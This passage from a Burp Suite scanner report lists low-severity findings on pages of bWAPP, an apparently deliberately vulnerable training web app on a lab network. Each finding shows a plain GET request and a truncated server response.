    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12990

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.54. http://192.168.52.147/bWAPP/hpp-1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12937

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.55. http://192.168.52.147/bWAPP/hpp-2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: hpp-1.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.56. http://192.168.52.147/bWAPP/hpp-3.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: hpp-1.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.57. http://192.168.52.147/bWAPP/htmli_current_url.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_current_url.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_current_url.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13019

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.58. http://192.168.52.147/bWAPP/htmli_get.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_get.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_get.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13242

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.59. http://192.168.52.147/bWAPP/htmli_post.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_post.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_post.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13333

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.60. http://192.168.52.147/bWAPP/htmli_stored.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_stored.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_stored.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14128

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.61. http://192.168.52.147/bWAPP/http_response_splitting.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_response_splitting.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/http_response_splitting.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/smgmt_admin_portal.php?admin=1
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:56:56 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12977

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.62. http://192.168.52.147/bWAPP/http_verb_tampering.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_verb_tampering.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/http_verb_tampering.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13382

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.63. http://192.168.52.147/bWAPP/iframei.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/iframei.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/iframei.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:58:47 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.64. http://192.168.52.147/bWAPP/images/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 4906
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/images</title>
    </head>
    <body>
    <h1>Index of /bWAPP/images</h1>
    <table><tr><th><img src="/icons/blank.gi
    ...[SNIP]...
    18.65. http://192.168.52.147/bWAPP/images/file.txt
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/file.txt

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/file.txt HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:01 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Fri, 09 Mar 2018 02:55:00 GMT
    ETag: "8c040-18-566f1eb09e900"
    Accept-Ranges: bytes
    Content-Length: 24
    Connection: close
    Content-Type: text/plain

    555-555-0199@example.com
    18.66. http://192.168.52.147/bWAPP/images/spider.swf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/images/spider.swf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/images/spider.swf HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: security_level=0; secret=QW55IGJ1Z3M%2F; PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Fri, 09 Mar 2018 02:55:10 GMT
    ETag: "8c04a-13e0e1-566f1eba27f80"
    Accept-Ranges: bytes
    Content-Length: 1302753
    Connection: close
    Content-Type: application/x-shockwave-flash

    CWS    ....x.|..P.....C .....!x.@...........!..;.w'.....{..W..m.........g..z...9.....L.....L..........t...dhlcL....C..5t...kv....h.K?R..V.. ..xk.c.b..`.7!g{...u...........=..z.?.B``.A7`.....A..t.    f...}
    ...[SNIP]...
    18.67. http://192.168.52.147/bWAPP/info.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/info.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/info.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/login.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3426
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    18.68. http://192.168.52.147/bWAPP/information_disclosure_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12983


    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?fami
    ...[SNIP]...
    18.69. http://192.168.52.147/bWAPP/information_disclosure_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12978

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.70. http://192.168.52.147/bWAPP/information_disclosure_3.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13744

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.71. http://192.168.52.147/bWAPP/information_disclosure_4.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/information_disclosure_4.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/information_disclosure_4.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12978

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.72. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13042

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.73. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
